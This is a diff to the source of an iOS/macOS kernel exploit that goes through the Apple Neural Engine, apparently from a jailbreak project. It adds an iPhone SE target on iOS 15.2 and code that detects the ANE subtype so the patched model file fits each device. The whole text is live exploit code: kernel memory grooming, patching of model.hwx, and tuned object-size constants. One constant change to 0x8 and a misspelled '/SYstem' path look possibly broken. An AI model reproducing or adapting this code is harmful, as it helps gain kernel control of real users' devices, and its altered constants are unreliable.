0x36 · ghh-jb · Nov 6, 2024 · Nov 11, 2024
diff --git a/exploit/.DS_Store b/exploit/.DS_Store
diff --git a/exploit/exploit.h b/exploit/exploit.h
@@ -31,13 +31,13 @@
 #if TARGET_OS_OSX
 
 #define MAX_PROGRAMS            5
-#define IOSURFACE_OBJ_SIZE      0x440
+#define IOSURFACE_OBJ_SIZE      0x8
 #define MAX_SHMEMS              0x2000
 
 #else
 
 #define MAX_PROGRAMS            5
-#define IOSURFACE_OBJ_SIZE      0x430
+#define IOSURFACE_OBJ_SIZE      0x8
 #define MAX_SHMEMS              0x2000
 
 #endif  /* TARGET_OS_OSX */

diff --git a/exploit/exploit.m b/exploit/exploit.m
@@ -12,8 +12,10 @@
  * iPhone12 Pro (iPhone13,3) with iOS 15.5
  * iPad Pro (iPad8,10) with iPadOS 15.5
  * iPhone11 Pro (iPhone12,3) with iOS 15.4.1
+ * iPhone SE 2020 (iPhone 12,8) with iOS 15.2
  * MacBookAir10,1 M1 with macOS 12.4
 
+
  [+] Loading AppleNeuralEngine framework ...OK
  [+] Patching model.hwx with custom initInfo section ... OK
  [+] Stage 1: Grooming kernel memory ...
@@ -73,6 +75,7 @@
 #include "exploit.h"
 
 
+
 struct exploit *p = NULL;
 
 serializer_info_t *sinfo = NULL;
@@ -113,6 +116,10 @@
 #define _ANEClient __ANEClient
 Class __ANEModel;
 Class __ANEClient;
+Class _ANEDeviceInfoClass;
+@interface _ANEDeviceInfo : NSObject
++(NSString*) aneSubType;
+@end
 char *gBundle = NULL;
 
 
@@ -137,6 +144,40 @@ void hwx_init_frameworks(void)
 
 #endif
 
+
+#if !TARGET_OS_OSX
+int getAneSubtype(void) {
+    NSBundle *appleNeuralEngineBundle = [NSBundle bundleWithPath:@"/SYstem/Library/PrivateFrameworks/AppleNeuralEngine.framework"];
+    [appleNeuralEngineBundle load];
+    /*load NeuralEngine*/
+
+    Class _ANEDeviceInfoClass = NSClassFromString(@"_ANEDeviceInfo");
+
+    NSURL* imagingNetworkURL = [NSURL fileURLWithPath:@"/System/Library/ImagingNetworks"];
+    /*path to .hwx – .net – .shape - _info*/
+
+    NSDirectoryEnumerator<NSURL*>* enumerator = [[NSFileManager defaultManager] enumeratorAtURL:imagingNetworkURL includingPropertiesForKeys:nil options:0 errorHandler:nil];
+
+    NSURL* file;
+    NSString* aneSubType = [_ANEDeviceInfoClass aneSubType].uppercaseString;
+    /*generate string of aneSubType*/
+    while(file = [enumerator nextObject]) {
+        if([file.pathExtension isEqualToString:@"hwx"] && [file.lastPathComponent containsString:aneSubType]){
+            /*find aneSubType version in mach_header*/
+            struct mach_header header;
+            FILE* f = fopen(file.fileSystemRepresentation, "r");
+            if(!f){continue;}
+            fread(&header, sizeof(struct mach_header), 1, f);
+            fclose(f);
+            return header.cpusubtype;
+
+        }
+    }
+    return -1;
+
+}
+#endif
+
 void hwx_patch_model(void)
 {
         printf("[+] Patching model.hwx with custom initInfo section ... ");
@@ -519,9 +560,12 @@ void _hwx_patch_model(struct mach_header_64 *mh,size_t mh_size,u8 ** initInfo)
         // TODO : use +[_ANEDeviceInfo aneSubType]
         /* iPhone 11 pro */
         /* mh->cpusubtype = 3; */
-
         /* iPad pro 2nd generation */
         /* mh->cpusubtype = 1; */
+        /* DONE */
+        #if !TARGET_OS_OSX
+        mh->cpusubtype = getAneSubtype();
+        #endif
 
         struct load_command *lc = NULL;
         FOR_EACH_COMMAND {